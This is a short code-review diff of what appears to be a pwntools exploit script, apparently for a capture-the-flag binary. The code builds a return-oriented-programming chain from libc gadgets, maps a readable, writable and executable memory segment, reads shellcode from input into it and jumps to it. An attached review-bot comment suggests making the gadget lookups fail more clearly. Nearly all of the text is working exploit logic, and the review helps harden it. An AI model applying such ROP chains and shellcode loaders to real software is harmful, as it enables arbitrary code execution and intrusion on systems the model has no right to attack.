|
@@ -88,8 +88,9 @@ def try_char(offset, char):
|
|
|
|
|
|
pop_rdi_ret = rop.find_gadget(["pop rdi", "ret"])
|
|
|
pop_rcx_ret = rop.find_gadget(["pop rcx", "ret"])
|
|
|
+ ret = rop.find_gadget(['ret'])
|
|
|
|
|
|
- rop.raw(rop.find_gadget(['ret']))
|
|
|
+ rop.raw(ret)
|
|
|
rop.raw(pop_rcx_ret)
|
|
|
rop.raw(32)
|
|
|
rop.raw(pop_rdi_ret)
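Review bot: The added `ret = rop.find_gadget(['ret'])` is used without confirming the lookup succeeded; pwntools' find_gadget returns None when no matching gadget exists, so a failed lookup would only surface later, as an unclear error when the chain is built from `rop.raw(ret)`. A guard right after the lookup makes the failure explicit, e.g. `if ret is None: raise RuntimeError("no 'ret' gadget found")`; the same applies to the `pop_rdi_ret` and `pop_rcx_ret` lookups shown as context above it. As a point of style, the hunk header places these lookups inside `try_char`, so they are repeated on every call; hoisting them to module level alongside the other constants would read more clearly. The body of try_char starts and ends outside the hunk.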
|
|
@@ -101,9 +102,7 @@ def try_char(offset, char):
|
|
|
else:
|
|
|
rop.raw(libc.address + 0x54d69) # shl r9, cl ; mov qword ptr [rdi], r9 ; ret
|
|
|
|
|
|
- rop.raw(rop.find_gadget(['ret']))
|
|
|
rop.mmap(new_segment, 0x1000, 7, 0x2|0x20) # MAP_ANONYMOUS|MAP_PRIVATE
|
|
|
-
|
|
|
rop.read(0, new_segment, 100)
|
|
|
rop.call(new_segment)
|
|
|
|